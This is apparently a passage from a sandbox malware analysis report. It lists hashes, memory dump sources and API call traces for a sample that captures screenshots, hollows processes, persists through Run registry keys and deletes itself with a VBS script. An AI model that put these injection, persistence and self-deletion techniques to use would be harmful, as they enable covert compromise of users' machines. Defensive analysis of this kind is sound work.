                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                • Instruction ID: ab2a7db36434afcf2ac5622ebbcdbc9ec845653f83f57f87e594a02dcd952e64
                                                                                • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                • Instruction Fuzzy Hash: F5B173791142998BCF15EF64C4913F63BA1EF6A300F0851B9EC9CCF756E2398906EB64
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction ID: 5038aa702aeb1f58a2bc67df1bbdaa1771580adac25176d37f7c26e50c6108b8
                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction Fuzzy Hash: F361887170074DA7DA38AA6C88DABFE7398EF41300F24051AE947DB291F65EDD82C359
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction ID: 6ca96b225f9ef6bbda37ea35fd7fbbba47e0342dc6eca50a3f10d205b635db41
                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                • Instruction Fuzzy Hash: E5614671200748D6DA389AA888AABFE33D4EF41704F18051AED42DB292F66DED41C757
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                                                                                • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                • Opcode Fuzzy Hash: 4b5a59be73fe3d7552967633f676dc99dfadfd796aed8a0763a0d7745ee382c3
                                                                                • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                • Instruction ID: d2811c7b95ba802b7c99bd57ae0eb635dc29df4bf1ab55c17c08f016195bd907
                                                                                • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                • Instruction Fuzzy Hash: 78615B32A0C3459FC308DF34D985A5BB7E8AFDD714F450E2EF4999A151E774EA088B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction ID: 2f88ba3cc1a963d86c2d7900e4973be527442462abd46937ca24dd6be51c9d99
                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                • Instruction Fuzzy Hash: BB112B772080C247DA1CCA2DD4B43FBAF85EBC5322B3C467AD4418BB58D62AEA44F600
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: 3107581f5a1fd6b2f547a8753fcb75ac1328b5c2fd6ebc1880acc18b8e143b56
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: E4119A72340104AFDB44DE59DC85FE777EAFB88320B298065ED08CB352E676E802C760
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: c137a415cd33a37c16b2a2ea5c25f585a778bfd2a950d56cefb96e01b2f897f6
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: 0C01F272B406008FDF61EF60C805BAB33E5FB86306F0544A4D90A97282E378A8498BD0
                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                                                • DeleteObject.GDI32(?), ref: 00418107
                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                • DeleteDC.GDI32(?), ref: 00418398
                                                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 1352755160-865373369
                                                                                • Opcode ID: 77081d5ada2269ff57f64c9903efe4521e7653376ee8caac7412943a0dd9a50c
                                                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                • Opcode Fuzzy Hash: 77081d5ada2269ff57f64c9903efe4521e7653376ee8caac7412943a0dd9a50c
                                                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                • API String ID: 4188446516-3035715614
                                                                                • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                • API String ID: 4250697656-2665858469
                                                                                • Opcode ID: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                • Opcode Fuzzy Hash: 272653f42f5ce35ac989e96870785c07462f55a59c90374d40adbc01c5aecd7d
                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                APIs
                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                • API String ID: 3797177996-1998216422
                                                                                • Opcode ID: 1a0008a7b032c45d953091ac1afb4bf8007bf4c9a0a3f4b2fa71c5b2a3510a05
                                                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
